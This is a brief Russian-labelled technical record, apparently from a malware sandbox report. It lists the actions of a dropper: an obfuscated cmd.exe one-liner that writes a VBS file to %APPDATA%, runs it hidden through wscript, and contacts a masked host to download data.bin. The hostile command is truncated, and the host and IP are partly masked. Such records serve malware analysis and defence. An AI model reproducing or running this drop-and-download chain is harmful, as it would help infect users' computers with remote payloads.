Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "KqYW=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM SFWj" "SUb Mg()" "FcMA6=26" "PJvH8U=""""" "WpxK=43" "Fm3k0OH=SFWj & ICbV & OBHc("7F1C4011","AQV3Z")" "LjyWI=17" "DomIj=OBHc("5B542116...
- %APPDATA%\1824.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\1824.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "KqYW=%APPDATA%\%RANDOM%.vbs" && (for %i in ("diM SFWj" "SUb Mg()" "FcMA6=26" "PJvH8U=""""" "WpxK=43" "Fm3k0OH=SFWj & ICbV & OBHc("7F1C4011","AQV3Z")" "LjyWI=17" "DomIj=OBHc("5B542116...' (со скрытым окном)